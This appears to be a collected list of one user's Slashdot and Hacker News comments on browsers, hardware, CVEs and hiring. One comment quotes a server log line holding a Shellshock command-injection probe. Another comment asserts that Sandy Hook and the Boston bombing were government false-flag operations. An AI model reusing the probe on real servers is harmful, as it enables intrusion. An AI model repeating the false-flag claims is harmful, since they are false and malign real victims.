For the adventurous:

1) open about:config 2) set gfx.webrender.enabled to true 3) restart Nightly

For the even more adventurous:

1) open about:config 2) set gfx.webrender.enabled to true 3) set gfx.webrendest.enabled to true 4) restart Nightly

Re:Experiences with the Thinkpad 13? on Saturday June 04, 2016 @08:59PM (#11839091)
I have a couple of the T420s and with the exception of having to replace the CPU fans in both of them, I have no complaints.
I found an OpenSSL bug that was assigned CVE-2015-0208 and it is still embargoed near as I can tell.
Re:What happened to all the non-programmers? on Wednesday March 04, 2015 @05:49PM (#9147955)
I'm a sys admin and security researcher and I'm not a programmer by any stretch of the word. Nor do I have a CS related college degree. I'm an anomaly in the tech world. ;)
Re:Firefox Developer Edition 38: 64-bits and more on Monday March 02, 2015 @06:00PM (#9134966)
Been using 64 bit Nightly builds (from Mozilla) for years. Not sure why this is news.
We really don't need more government regulation. I've got a bad feeling about this crap.
Re:Ask HN: What have you achieved in January 2015? on Wednesday February 04, 2015 @01:23PM (#8998557)
I found an OpenSSL bug which was assigned CVE-2015-0208 (details forthcoming). I feel like that is a good achievement. Follows on the heels of the PHP5 bug I found in December(CVE-2014-9427).
Re:Ask HN: XMPP/Jabber self hosting on Monday December 22, 2014 @08:03PM (#8786270)
I'm using Prosody. Supports TLS1.2 and Forward Secrecy.

Check your score on xmpp.net if you haven't already. ;)

Re:Everything you need to know about the Shellshock Bash bug on Friday September 26, 2014 @06:02PM (#8375144)
I've only seen 2 requests in my logs:

access.log:89.207.135.125 - - [25/Sep/2014:06:28:08 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 447 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

Re:Finally, It Will Be Legal to Unlock Your Own Cellphone on Saturday July 26, 2014 @04:41PM (#8090723)
FYI: This has absolutely nothing to do with bootloaders.
Re:Oklahoma botches first execution in 80 years on Thursday May 01, 2014 @08:41AM (#7679359)
The title says first execution in 80 years, but it was supposed to be the first double execution in 80 years.
Re:Ask HN: Who is hiring? (January 2014) on Thursday January 02, 2014 @01:07AM (#6998449)
I'd love to work for Flipboard, been using your Android app ever since you released it. Not interested in relocating though, so how can I change the 'probably not' into a 'hell yeah' for working remotely as an Operations Engineer? =)
I'd use Linux on my desktop if my entire Steam catalog would play under Linux, but since 99% of the games I play are Windows only, I'm stuck in the Windows world. ;)
Re:Cloud to Butt Plus on Friday September 20, 2013 @05:17PM (#6420567)
I put a 'Butt Computing' Greasemonkey script up here http://userscripts.org/scripts/show/96029 back in 2011. Nice to see some folks are as immature as I am. ;)
Re:EFF's HTTPS Everywhere removed from Chrome app store on Saturday August 17, 2013 @06:40PM (#6230620)
You can also use this command line flag:

--enable-easy-off-store-extension-install

Re:Ask HN: How do you manage your Twitter timeline? on Wednesday July 24, 2013 @04:42AM (#6095070)
I like the Android app called Fynch.

The official description says "Fynch enhances your Twitter experience by automatically analyzing your timeline for interesting patterns of activity. It is intended to be a tool that decomposes your timeline into smaller sets of tweets that are easier to consume. Fynch is great for identifying extremely high rates of activity, trending topic mentions, and the tweets of less active users in your following list."

I don't know why people have trouble getting a response from PayPal.. I submitted an XSS and a CRLF injection issue over the holiday weekend and got a response this morning.
Because it wasn't a false flag operation perpetrated by the government, it was just a normal act of violence that happens every day across the country. Sandy Hook = False flag operation to start disarming the populace. Boston = False flag operation to see how easy it would be to declare martial law in a major US city. =)

Hacker News doesn't need to be like Reddit. =)
